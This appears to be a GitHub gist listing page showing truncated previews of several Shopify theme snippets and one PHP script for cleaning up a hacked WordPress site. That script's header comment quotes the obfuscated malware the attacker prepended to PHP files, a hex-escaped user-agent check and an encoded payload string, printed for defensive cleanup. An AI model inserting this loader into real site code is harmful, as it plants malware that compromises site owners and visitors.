This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- funding tracker widget --> | |
<div class="flex_header_full" style="display: none"> | |
<!-- header image here --> | |
</div> | |
<div style="" id="funding_tracker" data-id="{{ product.id }}" data-shop="{{ shop.permanent_domain | escape }}"></div> | |
<div class="tracking_wrapper" style="display: none; background: none;"> | |
<div class="tracking_inner"> | |
<div style="display: none;" class="tracking_title fund_title"></div> | |
<div style="display: none;" class="progress_left fund_raised"></div> | |
<div class="progress_bar" style="max-height: 10px; background: #ccc; "> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* A script to cleanup a hacked Wordpress site. | |
* | |
* The hacker prepended the following to most/all of the .php files: | |
* <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $uispnwkeuy = 'c%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sbx7825))!gj!<*#cd2bge56+99386c825tzw%x5c%x782f%x5c%75%156%x61"]=1; functio8y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvx7825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuop%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5cpd%x5c%x78256<pd%x5c%x7825w6Zj%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]2212]445]43]321]464]284]364]6]234]342]58]24]315c%x5c%x7825j^%x5c%x7824-%x5c%x782 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. add snippet to cart.liquid file at the bottom of the file | |
{% include 'upsell-modal' %} | |
2. add css to theme.liquid in the header | |
{{ 'upsell-modal.scss' | asset_url | stylesheet_tag }} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{% comment %} | |
Source: https://gist.github.com/carolineschnapp/9122054 | |
If you are not on a collection page, do define which collection to use in the order form. | |
Use the following assign statement, replace 'your-collection-handle-here' with your collection handle. | |
{% assign collection = collections.your-collection-handle-here %} | |
Use the assign statement outside of this comment block at the top of your template. | |
{% endcomment %} | |
{% paginate collection.products by 100 %} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<link href='//pressify.s3.amazonaws.com/assets/fancybox/source/jquery.fancybox.css' rel='stylesheet' type='text/css'> | |
<script src="//pressify.s3.amazonaws.com/assets/fancybox/source/jquery.fancybox.js" type="text/javascript"></script> | |
<script src="//npmcdn.com/[email protected]/dist/masonry.pkgd.min.js"></script> | |
<script src="//npmcdn.com/[email protected]/imagesloaded.pkgd.min.js"></script> | |
<link href='//pressify.s3.amazonaws.com/assets/bxslider/jquery.bxslider.css' rel='stylesheet' type='text/css'> | |
<script src="//pressify.s3.amazonaws.com/assets/bxslider/jquery.bxslider.min.js"></script> | |
<div class="lookbook_details" style=""></div> | |
<script> | |
jQuery(document).ready(function(){ | |
// app domain |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<div id="section-inspiration"> | |
<ul class="inspiration-images"> | |
<li class="inspiration-1"><img src="#" class="inspiration-image fade-in" /></li> | |
<li class="inspiration-1"><img src="#" class="inspiration-image fade-in" /></li> | |
<li class="inspiration-1"><img src="#" class="inspiration-image fade-in" /></li> | |
<li class="inspiration-1"><img src="#" class="inspiration-image fade-in" /></li> | |
<li class="inspiration-1"><img src="#" class="inspiration-image fade-in" /></li> | |
<li class="inspiration-1"><img src="#" class="inspiration-image fade-in" /></li> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<div class="product-swatches-{{product.id}}"></div> | |
<div style="clear:both;"></div> | |
<script> | |
jQuery(document).ready(function(){ | |
var appDomain = '//productswatches.herokuapp.com'; | |
var url = appDomain + '/product_swatches/get-json/{{product.id}}'; | |
var data = { | |
return_format: 'html', | |
product_id:'{{product.id}}', | |
tooltip: 'yes', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
Simple method for detecting an Admin in Shopify using liquid. | |
Quick code by jason at freakdesign.com.au | |
Related Blog post: http://freakdesign.com.au/blogs/news/34154561 | |
--> | |
{% capture CFH %}{{ content_for_header }}{% endcapture %}{{ CFH }} | |
{% if CFH contains 'admin_bar_iframe' %} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<div class="swatchslider"> | |
<ul class="slides product-swatches-{{product.id}}"></ul> | |
</div> | |
<div style="clear:both;"></div> | |
<script> | |
/*$(window).load(function() { | |
$('.swatchslider').flexslider({ | |
animation: "slide", | |
animationLoop: false, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<table class="cart"> | |
<thead class="heading"> | |
<tr> | |
<th>Product</th> | |
<th>Quantity</th> | |
<th>Total</th> | |
</tr> | |
</thead> | |
<tbody class="line-items"> |
OlderNewer